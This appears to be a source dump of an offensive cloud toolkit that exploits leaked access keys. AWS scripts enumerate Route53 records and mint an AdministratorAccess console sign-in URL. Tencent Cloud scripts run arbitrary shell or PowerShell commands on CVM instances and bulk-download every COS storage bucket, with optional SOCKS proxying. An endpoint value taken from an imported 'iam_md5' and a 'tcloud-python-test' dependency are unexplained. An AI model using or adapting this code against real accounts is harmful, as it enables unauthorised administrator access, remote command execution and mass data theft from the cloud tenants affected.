        hosted_zones += hosted_zone["HostedZones"]
    zones = {}

    if len(hosted_zones) > 0:
        for zone in hosted_zones:
            zid = zone["Id"].split("/")[2]
            print(
                f"ZoneID: {zid}  Name: {zone['Name']} Private: {zone['Config']['PrivateZone']} "
            )
            zones[zid] = zone
    else:
        print("No HostedZones found")

    return zones

def get_query_logging_config(client):
    configs = client.list_query_logging_configs()["QueryLoggingConfigs"]

    if len(configs) > 0:
        print("QueryLoggingConfigs:")
        for con in configs:
            print(
                f"ZoneID: {con['HostedZoneId']} :: CloudWatchLogsLogGroupArn: {con['CloudWatchLogsLogGroupArn']}"
            )
    else:
        print("No QueryLoggingConfigs found")

    return configs

def query_route53_instances(AccessKeyID, AccessKeySecret):
    all_records_for_zone = []
    record_sets = {}
    route53_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='route53', session_token=None,
                            region=None)
    try:
        zones = get_hosted_zones(client=route53_client)
        for hosted_zone_id in zones.keys():
            paginator = route53_client.get_paginator("list_resource_record_sets")
            for resource_records in paginator.paginate(HostedZoneId=hosted_zone_id):
                all_records_for_zone += resource_records["ResourceRecordSets"]
            record_sets[hosted_zone_id] = {"ResourceRecordSets": all_records_for_zone}
            if len(record_sets[hosted_zone_id]) > 0:
                print(f"\nResourceRecordSets for {hosted_zone_id}:")
                for record in record_sets[hosted_zone_id]["ResourceRecordSets"]:
                    print(f"Name: {record['Name']} Type: {record['Type']}")
            else:
                print("No ResourceRecordSets found")

    except ClientError as error:
        print(f"Failed to list R53 Hosted Zones: {error}")
        return

    try:
        confs = get_query_logging_config(client=route53_client)
    except ClientError as error:
        print(f"Failed to list R53 Hosted Zone Query Logging Configurations: {error}")
        return

if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("请输入AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("请输入AccessKeySecret:")

    route53_info = query_route53_instances(AccessKeyID, AccessKeySecret)

================================================
FILE: aws/aws_url_console.py
================================================
from aws_consoler.cli import main
import config
import re
import requests
import json
import boto3
import sys
import aws_select_iam
from botocore.exceptions import ClientError
from botocore.session import ComponentLocator
from enumerate_iam.main import get_client
from aws_select_iam import iam_md5
import urllib.parse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

#import socket, socks
#default_socket = socket.socket
#socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
#socket.socket = socks.socksocket


def _get_partition_endpoints(region: str):
    # AWS China endpoints
    if re.match(r"^cn-\w+-\d+$", region):
        return {
            "partition": "aws-cn",
            "console": "https://console.amazonaws.cn/console/home",
            "federation": "https://signin.amazonaws.cn/federation",
        }

    # AWS GovCloud endpoints
    if re.match(r"^us-gov-\w+-\d+$", region):
        return {
            "partition": "aws-us-gov",
            "console": "https://console.amazonaws-us-gov.com/console/home",
            "federation": "https://signin.amazonaws-us-gov.com/federation"
        }

    # AWS ISO endpoints (guessing from suffixes in botocore's endpoints.json)
    if re.match(r"^us-iso-\w+-\d+$", region):
        return {
            "partition": "aws-iso",
            "console": "https://console.c2s.ic.gov/console/home",
            "federation": "https://signin.c2s.ic.gov/federation"
        }

    # AWS ISOB endpoints (see above)
    if re.match(r"^us-isob-\w+-\d+$", region):
        return {
            "partition": "aws-iso-b",
            "console": "https://console.sc2s.sgov.gov/console/home",
            "federation": "https://signin.sc2s.sgov.gov/federation"
        }

    # Otherwise, we (should?) be using the default partition.
    if re.match(r"^(us|eu|ap|sa|ca|me)-\w+-\d+$", region):
        pass
    return {
        "partition": "aws",
        "console": "https://console.aws.amazon.com/console/home",
        "federation": "https://signin.aws.amazon.com/federation"
    }


def run(access_key_id, secret_access_key, region):

    # Set up the base session
    session: boto3.Session
    # If we have a profile, use that.
    session = boto3.Session(aws_access_key_id=access_key_id,
                            aws_secret_access_key=secret_access_key,
                            region_name=region)
    # Otherwise, let boto figure it out.
    if session.get_credentials().get_frozen_credentials() \
            .access_key.startswith("AKIA"):
        component = ComponentLocator()
        component.register_component(name='AWS_ENDPOINT', component=iam_md5[1:])
        sts_client = get_client(access_key=access_key_id, secret_key=secret_access_key, service_name='sts',
                                session_token=None,
                                region=region, components=component)
        try:
            resp = sts_client.get_federation_token(
                Name="aws_consoler",
                PolicyArns=[
                    {"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}
                ])
            creds = resp["Credentials"]
            session = boto3.Session(
                aws_access_key_id=creds["AccessKeyId"],
                aws_secret_access_key=creds["SecretAccessKey"],
                aws_session_token=creds["SessionToken"],
                region_name=region)
        except ClientError:
            message = "Error obtaining federation token from STS. Ensure " \
                      "the IAM user has sts:GetFederationToken permissions, " \
                      "or provide a role to assume. "
            raise PermissionError(message)

    # Check that our credentials are valid.
    sts = session.client("sts")
    resp = sts.get_caller_identity()

    # TODO: Detect things like user session credentials here.

    # Get the partition-specific URLs.
    partition_metadata = _get_partition_endpoints(session.region_name)
    federation_endpoint = partition_metadata["federation"]
    console_endpoint = partition_metadata["console"]

    # Generate our signin link, given our temporary creds
    creds = session.get_credentials().get_frozen_credentials()
    json_creds = json.dumps(
        {"sessionId": creds.access_key,
         "sessionKey": creds.secret_key,
         "sessionToken": creds.token})
    token_params = {
        "Action": "getSigninToken",
        # TODO: Customize duration for federation and sts:AssumeRole
        "SessionDuration": 43200,
        "Session": json_creds
    }
    resp = requests.get(url=federation_endpoint, params=token_params)
    # Stacking AssumeRole sessions together will generate a 400 error here.
    try:
        resp.raise_for_status()
    except requests.exceptions.HTTPError as e:
        raise requests.exceptions.HTTPError(
            "Couldn't obtain federation token (trying to stack roles?): "
            + str(e))

    fed_token = json.loads(resp.text)["SigninToken"]
    console_params = {}
    if region:
        console_params["region"] = region
    login_params = {
        "Action": "login",
        "Issuer": "consoler.local",
        "Destination": console_endpoint + "?"
                       + urllib.parse.urlencode(console_params),
        "SigninToken": fed_token
    }
    login_url = federation_endpoint + "?" + urllib.parse.urlencode(login_params)

    return login_url


if __name__ == '__main__':
    region = "us-east-1"
    url = run(config.AccessKeyID, config.AccessKeySecret, region)
    sys.exit(url)

================================================
FILE: aws/config.py
================================================
#SOCKS5_PROXY_HOST = "127.0.0.1"
#SOCKS5_PROXY_PORT = 10800

AccessKeyID = ''
AccessKeySecret = ''

================================================
FILE: aws/ec2_role_trust_policy.json
================================================
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Service": "ec2.amazonaws.com"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

================================================
FILE: aws/requirements.txt
================================================
boto3
aws-consoler
PySocks


================================================
FILE: tencentcloud/README.en.md
================================================
English | [中文](./README.md)
## File description

#### tencentcloud_cvm_exec.py
Used to query detailed information of cvm instances in various regions of Tencent Cloud and specify cvm instances to execute commands.
#### tencentcloud_download_cos.py
Used to query the cos storage instances of Tencent Cloud in various regions and download the files in the cos storage instances.
#### config.py
Configuration information required to run the code, including accesskey, accesskeysecret, proxy IP and port and other parameters

## Instructions for use
To install the required dependencies before use, run `pip install -r requirements.txt`, fill in the corresponding values ​​​​in config.py, run the corresponding py script directly, and enter the corresponding values ​​​​as prompted.

## proxy

The socks proxy is provided in the code. When you need to use it, fill in the ip and port values ​​​​in config.py, and then remove the corresponding comment part in the code.


================================================
FILE: tencentcloud/README.md
================================================
[English](./README.en.md) | 中文
## 文件说明

#### tencentcloud_cvm_exec.py
用于查询腾讯云各地区cvm实例的详细信息，并可指定cvm实例执行命令
#### tencentcloud_download_cos.py
用于查询腾讯云各地区的cos存储实例，并对cos存储实例中的文件进行下载
#### config.py
代码运行所需的配置信息，包括accesskey、accesskeysecret、代理的ip和端口等参数

## 使用说明
使用前安装所需的依赖，运行pip install -r requirements.txt即可，填好config.py中对应的值，直接运行对应的py脚本，按照提示输入对应的值

## 代理
代码中提供了socks代理，需要使用时在config.py中填好ip和port值，然后去掉代码中对应的注释部分即可


================================================
FILE: tencentcloud/config.py
================================================
RegionIds = {"ap-guangzhou": "华南地区(广州)", "ap-shanghai": "华东地区(上海)", "ap-nanjing": "华东地区(南京)",
             "ap-beijing": "华北地区(北京)",
             "ap-chengdu": "西南地区(成都)", "ap-chongqing": "西南地区(重庆)", "ap-hongkong": "港澳台地区(中国香港)",
             "ap-seoul": "亚太东北(首尔)",
             "ap-tokyo": "亚太东北(东京)", "ap-singapore": "亚太东南(新加坡)", "ap-bangkok": "亚太东南(曼谷)",
             "ap-jakarta": "亚太东南(雅加达)",
             "na-siliconvalley": "美国西部(硅谷)", "eu-frankfurt": "欧洲地区(法兰克福)", "ap-mumbai": "亚太南部(孟买)",
             "na-ashburn": "美国东部(弗吉尼亚)",
             "sa-saopaulo": "南美地区(圣保罗)", "na-toronto": "北美地区(多伦多)"}
SOCKS5_PROXY_HOST = "127.0.0.1"
SOCKS5_PROXY_PORT = 10800
AccessKeyID = ''
AccessKeySecret = ''

================================================
FILE: tencentcloud/requirements.txt
================================================
tencentcloud-sdk-python
PySocks
tcloud-python-test


================================================
FILE: tencentcloud/tencentcloud_cvm_exec.py
================================================

from tencentcloud.common.exception import TencentCloudSDKException
from tencentcloud.cvm.v20170312 import cvm_client, models
from tencentcloud.common import credential
from tencentcloud.tat.v20201028 import tat_client, models as tat_models
import json, base64, random, socket, socks, config
import time


# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket


def DescribeAutomationAgentStatus(AccessKeyID, AccessKeySecret, ZoneId, InstanceId):
    cred = credential.Credential(AccessKeyID, AccessKeySecret)
    client = tat_client.TatClient(cred, ZoneId)
    req = tat_models.DescribeAutomationAgentStatusRequest()
    req.InstanceIds = InstanceId
    resp = client.DescribeAutomationAgentStatus(req)
    return resp


def CreateCommand(cred, com_type, command, ZoneId, InstanceId):
    client = tat_client.TatClient(cred, ZoneId)
    req = tat_models.CreateCommandRequest()

    name = ''.join(random.sample(
        ['z', 'y', 'x', 'w', 'v', 'u', 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'k', 'j', 'i', 'h', 'g', 'f', 'e',
         'd', 'c', 'b', 'a'], 5))
    try:
        InstanceIds = []
        InstanceIds.append(InstanceId)
        CloudAssistantStatus = DescribeAutomationAgentStatus(AccessKeyID, AccessKeySecret, ZoneId, InstanceIds)
        Status = CloudAssistantStatus.AutomationAgentSet[0].AgentStatus
        if Status == 'Offline':
            print('未安装自动化助手，不能执行命令。')
            return
        req.CommandName = name
        command = base64.b64encode(command.encode()).decode()
        req.Content = command
        req.CommandType = com_type
        response = client.CreateCommand(req)
        return response.CommandId
    except Exception as e:
        print(e)
        print('命令创建失败')


def InvokeCommand(cred, ZoneId, InstanceId, command_ID):
    client = tat_client.TatClient(cred, ZoneId)
    try:
        req = tat_models.InvokeCommandRequest()
        InstanceIds = []
        InstanceIds.append(InstanceId)
        req.InstanceIds = InstanceIds
        req.CommandId = command_ID
        resp = client.InvokeCommand(req)
        if resp.InvocationId == '':
            print('命令执行错误')
        else:
            return resp.InvocationId
    except Exception as e:
        print(e)
        print('命令执行失败')


def InvocationTaskIdTasks(cred, ZoneId, InvokeID):
    client = tat_client.TatClient(cred, ZoneId)
    req = tat_models.DescribeInvocationTasksRequest()
    InvocationTaskIds = []
    InvocationTaskIds.append(InvokeID)
    params = {
        "Filters": [{
            "Name": "invocation-id",
            "Values": InvocationTaskIds
        }],
        "HideOutput": False
    }
    req.from_json_string(json.dumps(params))
    resp = client.DescribeInvocationTasks(req)
    return resp


def DeleteCommand(cred, ZoneId, command_ID):
    client = tat_client.TatClient(cred, ZoneId)
    req = tat_models.DeleteCommandRequest()
    req.CommandId = command_ID
    resp = client.DeleteCommand(req)


def commad_check_input(cred, InstanceId, cmd, com_type, cvm_info):
    if cmd == '':
        cmd = input("please input cmd:")
    if com_type == None:
        com_type = input('请输入执行命令类型:'
                         '0:SHELL'
                         '1:POWERSHELL'
                         ':')
    if com_type == '0':
        com_type = 'SHELL'
    elif com_type == '1':
        com_type = 'POWERSHELL'

    Status = None
    ZoneId = None
    for instances in cvm_info:
        for instance in instances:
            if instance.InstanceId == InstanceId:
                Status = instance.InstanceState
                ZoneId = instance.Placement.Zone.rsplit("-", 1)[0]
                break
    if Status == 'STOPPED':
        print('实例未运行,请选择运行状态实例执行命令')
        return
    command_ID = CreateCommand(cred, com_type, cmd, ZoneId, InstanceId)
    InvokeID = InvokeCommand(cred, ZoneId, InstanceId, command_ID)
    time.sleep(1)
    Result = InvocationTaskIdTasks(cred, ZoneId, InvokeID)
    try:
        TaskStatus = Result.InvocationTaskSet[0].TaskStatus
        if TaskStatus == "SUCCESS":
            output = Result.InvocationTaskSet[0].TaskResult.Output
            print("命令执行结果：" + base64.b64decode(output).decode('utf-8', 'ignore'))
            DeleteCommand(cred, ZoneId, command_ID)
    except:
        pass
    return 0


def query_cvm_instances(cred):
    instance_list = []
    for RegionId in config.RegionIds:
        print('检索中-------' + RegionId)
        client = cvm_client.CvmClient(cred, RegionId)

        try:
            req = models.DescribeInstancesRequest()
            resp = client.DescribeInstances(req)
        except Exception as e:
            print(e)
            print('请检查输入Key与Secret值,或重新执行')
            continue
        instance_list.append(resp.InstanceSet)
    return instance_list


if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("请输入AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("请输入AccessKeySecret:")

    cred = None
    try:
        cred = credential.Credential(AccessKeyID, AccessKeySecret)
    except TencentCloudSDKException:
        print("AK或SK不正确，请输入正确的AKSK")
        exit(0)

    cvm_info = query_cvm_instances(cred)
    print(cvm_info)
    print("提示： 使用自动化助手在实例上执行命令，指定的实例需要处于 VPC 网络。json中参数为：VirtualPrivateCloud")
    if not cvm_info:
        print("no result")
        exit(0)
    InstanceId = input("请输入选择的instanceId:")
    com_type = None
    while True:
        if com_type is None:
            com_type = input('请输入执行命令类型:'
                             '0:SHELL'
                             '1:POWERSHELL'
                             ':')
        cmd = ''
        commad_check_input(cred, InstanceId, cmd, com_type, cvm_info)
        flag = input("输入q退出，其他字符继续:")
        if flag == 'q':
            break
        is_continue = input("重新选择InstanceId请输入yes:")
        if is_continue == 'yes':
            print(cvm_info)
            com_type = None
            InstanceId = input("请输入选择的instanceId:")

================================================
FILE: tencentcloud/tencentcloud_download_cos.py
================================================
import json, base64, random, config
import qcloud_cos
from qcloud_cos import CosConfig
from qcloud_cos import CosS3Client
import queue
import threading
import os
from concurrent.futures import ThreadPoolExecutor, as_completed

# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket

workqueue = queue.Queue()
lock = threading.Lock()


def workqueue_get():
    while True:
        if workqueue.qsize() > 50:
            keys = []
            for i in range(50):
                keys.append(workqueue.get())
            with ThreadPoolExecutor(max_workers=15) as executor:
                future_list = [executor.map(download_to_local, keys)]
        elif workqueue.qsize() < 50 and not thread.is_alive():
            keys1 = []
            for i in range(workqueue.qsize()):
                keys1.append(workqueue.get())
            with ThreadPoolExecutor(max_workers=15) as executor:
                future_list = [executor.map(download_to_local, keys1)]
            break


def root_directory_list(prefix, bucket_name, client, flag=True):
    MAX_RETRIES = 10
    retry_count = 0
    marker = ""
    cos_dir = []
    delimiter = ""
    if flag == False:
        delimiter = "/"
    while True:
        try:
            retry_count += 1
            response = client.list_objects(
                Bucket=bucket_name,
                Prefix=prefix,
                Marker=marker,
                Delimiter=delimiter,
            )
            marker = response.get('NextMarker')
            commonprefix = response.get('CommonPrefixes')
            for obj in (response['Contents']):
                if str(obj['Key'])[-1] == '/':
                    pass
                elif flag:
                    # print(str(obj['Key']))
                    workqueue.put(str(obj['Key']))
            if commonprefix is not None:
                for cos_dir1 in commonprefix:
                    cos_dir.append(cos_dir1['Prefix'])
            if marker is None:
                break
        except Exception as e:
            print(e)
            if retry_count >= MAX_RETRIES:
                raise
    return cos_dir


def download_to_local(object_name):
    url = "./" + name + "/" + object_name
    file_name = url[url.rindex("/") + 1:]
    file_path_prefix = url.replace(file_name, "")
    lock.acquire()
    if not os.path.exists(file_path_prefix):
        os.makedirs(file_path_prefix)
    lock.release()
    if not os.path.exists(url):
        MAX_RETRIES = 10
        retry_count = 0
        while True:
            try:
                retry_count += 1
                print("开始下载：" + object_name)
                response = client.get_object(Bucket=name, Key=object_name)
                response['Body'].get_stream_to_file(url)
                print("下载完毕" + url)
                break
            except Exception as e:
                print(e)
                if retry_count >= MAX_RETRIES:
                    raise


if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("请输入AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("请输入AccessKeySecret:")

    BucketName_all = {}
    token = None
    scheme = 'https'
    try:
        config = CosConfig(Region="ap-guangzhou", SecretId=AccessKeyID, SecretKey=AccessKeySecret, Token=token,
                           Scheme=scheme)
        client = CosS3Client(config)
        response = client.list_buckets()
        for bucket in response['Buckets']['Bucket']:
            BucketName_all[bucket['Name']] = bucket['Location']
            print("Bucket名称：" + bucket['Name'], "Bucket创建时间：" + bucket['CreationDate'],
                  "外网域名：" + bucket['Location'], "Bucket存储类型：" + bucket['BucketType'])
    except qcloud_cos.cos_exception.CosServiceError:
        print("AK或SK不正确，请输入正确的AKSK")
        exit(0)
    except qcloud_cos.cos_exception.CosClientError:
        print("网络异常，尝试切换代理")
        exit(0)

    BucketName = input("指定BucketName进行下载 或 all下载所有:")

    if BucketName == 'all':
        for name, region in BucketName_all.items():
            config = CosConfig(Region=region, SecretId=AccessKeyID, SecretKey=AccessKeySecret, Token=token,
                               Scheme=scheme)
            client = CosS3Client(config)
            thread = threading.Thread(target=root_directory_list, args=("", name, client))
            thread.start()
            workqueue_get()
    else:
        name = BucketName
        region = BucketName_all[BucketName]
        config = CosConfig(Region=region, SecretId=AccessKeyID, SecretKey=AccessKeySecret, Token=token,
                           Scheme=scheme)
        client = CosS3Client(config)
        print(root_directory_list("", BucketName, client, False))
        oss_dir = input("指定存储桶文件夹 不指定则为根目录:")
        if BucketName:
            thread = threading.Thread(target=root_directory_list, args=(oss_dir, BucketName, client))
            thread.start()
            workqueue_get()